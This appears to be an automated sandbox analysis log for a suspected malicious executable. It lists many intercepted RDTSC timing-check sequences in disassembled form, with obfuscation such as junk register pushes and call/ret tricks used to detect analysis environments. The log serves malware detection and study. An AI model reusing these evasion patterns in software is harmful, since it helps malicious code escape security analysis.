Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B783E3 second address: B783F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3F4513F2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3D6 second address: B7A3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3DA second address: B7A3EC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B795FB second address: B795FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3EC second address: B7A3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3F0 second address: B7A3FA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A3FA second address: B7A400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A400 second address: B7A404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7A404 second address: B7A462 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D3B37h], ecx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FA3F4513F28h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov ebx, 31A0E200h 0x00000030 push 00000000h 0x00000032 jp 00007FA3F4513F2Ch 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c jmp 00007FA3F4513F35h 0x00000041 pop edi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B2B6 second address: B7B2BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B2BB second address: B7B2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B2C1 second address: B7B334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FA3F4E97198h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D3B24h], edx 0x00000028 adc edi, 322314F3h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FA3F4E97198h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a jmp 00007FA3F4E9719Dh 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+122D2960h] 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push ebx 0x0000005b pushad 0x0000005c popad 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B334 second address: B7B33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7C311 second address: B7C317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B4F5 second address: B7B4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B4F9 second address: B7B578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub ebx, 33EDF63Dh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FA3F4E97198h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 and di, 260Eh 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 xor edi, 2BA02F13h 0x00000047 mov eax, dword ptr [ebp+122D09B5h] 0x0000004d push 00000000h 0x0000004f push eax 0x00000050 call 00007FA3F4E97198h 0x00000055 pop eax 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc eax 0x00000063 push eax 0x00000064 ret 0x00000065 pop eax 0x00000066 ret 0x00000067 mov dword ptr [ebp+122D1E03h], edi 0x0000006d push FFFFFFFFh 0x0000006f sub edi, 0953BBE1h 0x00000075 nop 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B578 second address: B7B592 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FA3F4513F28h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7B592 second address: B7B598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B803CF second address: B803FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3F4513F2Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7F52E second address: B7F532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B7F532 second address: B7F538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8057A second address: B8057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B86EC1 second address: B86EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3F4513F26h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FA3F4513F2Eh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B86EE2 second address: B86EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8C246 second address: B8C274 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FA3F4513F26h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 jl 00007FA3F4513F26h 0x00000016 jmp 00007FA3F4513F2Bh 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 jo 00007FA3F4513F26h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8B912 second address: B8B918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8B918 second address: B8B91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8B91C second address: B8B922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8BC1C second address: B8BC3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FA3F4513F31h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B8BDFE second address: B8BE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA3F4E97196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B929D2 second address: B929D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92B6E second address: B92B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92B88 second address: B92BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007FA3F4513F2Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007FA3F4513F28h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92BAF second address: B92BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92BB5 second address: B92BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B92BB9 second address: B92BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnp 00007FA3F4E97196h 0x00000013 jg 00007FA3F4E97196h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B98347 second address: B9834D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B9834D second address: B98367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B98367 second address: B983A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007FA3F4513F3Eh 0x0000000f jmp 00007FA3F4513F38h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jl 00007FA3F4513F26h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B983A0 second address: B983A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B983A4 second address: B983A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B977FE second address: B97808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B97808 second address: B9786A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Fh 0x00000007 jmp 00007FA3F4513F39h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 jp 00007FA3F4513F31h 0x00000018 popad 0x00000019 jo 00007FA3F4513F46h 0x0000001f pushad 0x00000020 jc 00007FA3F4513F26h 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA3F4513F2Ch 0x00000032 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B98019 second address: B98036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA3F4E97196h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push edx 0x0000000e jc 00007FA3F4E97196h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007FA3F4E97196h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B981B4 second address: B981E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA3F4513F26h 0x0000000a jmp 00007FA3F4513F32h 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3F4513F34h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA0CF6 second address: BA0CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA0CFA second address: BA0D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4513F34h 0x0000000b popad 0x0000000c jg 00007FA3F4513F34h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2281A second address: B22824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B682F7 second address: B68395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jbe 00007FA3F4513F32h 0x00000011 jmp 00007FA3F4513F2Ch 0x00000016 pop esi 0x00000017 nop 0x00000018 mov edx, 3B01A9B4h 0x0000001d lea eax, dword ptr [ebp+1247F0AFh] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007FA3F4513F28h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d call 00007FA3F4513F31h 0x00000042 add dword ptr [ebp+122D2FFBh], ecx 0x00000048 pop edi 0x00000049 sub dword ptr [ebp+122D58DEh], esi 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jl 00007FA3F4513F26h 0x00000059 jmp 00007FA3F4513F37h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68395 second address: B683CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3F4E971ADh 0x00000008 jmp 00007FA3F4E971A7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA3F4E971A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A1F second address: B68A31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A31 second address: B68A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xor dword ptr [esp], 13CFADD0h 0x0000000d movsx edi, si 0x00000010 sub di, D900h 0x00000015 push 4DD799B4h 0x0000001a push eax 0x0000001b push edx 0x0000001c jo 00007FA3F4E9719Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A55 second address: B68A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68A59 second address: B68A5E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68AEB second address: B68AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68B5F second address: B68B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68B69 second address: B68BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FA3F4513F28h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007FA3F4513F38h 0x00000031 jmp 00007FA3F4513F30h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B68BDD second address: B68BEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6934F second address: B69353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69353 second address: B69379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 ja 00007FA3F4E971B8h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA3F4E971A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69379 second address: B6937D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6937D second address: B693B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007FA3F4E9719Fh 0x0000000c push 0000001Eh 0x0000000e mov edx, 0982768Ah 0x00000013 nop 0x00000014 ja 00007FA3F4E9719Eh 0x0000001a jnl 00007FA3F4E97198h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jns 00007FA3F4E97198h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6975C second address: B6976B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B6976B second address: B69775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69775 second address: B69779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B69779 second address: B697DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FA3F4E97198h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1D45h], esi 0x00000029 lea eax, dword ptr [ebp+1247F0AFh] 0x0000002f call 00007FA3F4E971A4h 0x00000034 add dword ptr [ebp+122D2FD8h], edx 0x0000003a pop edi 0x0000003b adc edi, 3D766AC6h 0x00000041 nop 0x00000042 js 00007FA3F4E971A4h 0x00000048 push eax 0x00000049 push edx 0x0000004a jng 00007FA3F4E97196h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B697DF second address: B697FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA3F4513F34h 0x0000000f jmp 00007FA3F4513F2Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B697FC second address: B4D518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA3F4E97196h 0x00000009 jg 00007FA3F4E97196h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 movzx ecx, bx 0x00000016 call dword ptr [ebp+122D3712h] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B9FEAA second address: B9FECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA3F4513F35h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA018F second address: BA01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FA3F4E97196h 0x0000000d jl 00007FA3F4E97196h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA01A2 second address: BA01C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA3F4513F2Fh 0x0000000c jp 00007FA3F4513F26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA0328 second address: BA033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3F4E97196h 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FA3F4E97196h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA033B second address: BA0345 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3F4513F2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA05CB second address: BA05E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA05E0 second address: BA062A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FA3F4513F26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FA3F4513F45h 0x00000014 jmp 00007FA3F4513F2Ah 0x00000019 jmp 00007FA3F4513F35h 0x0000001e jmp 00007FA3F4513F37h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: BA08F7 second address: BA08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
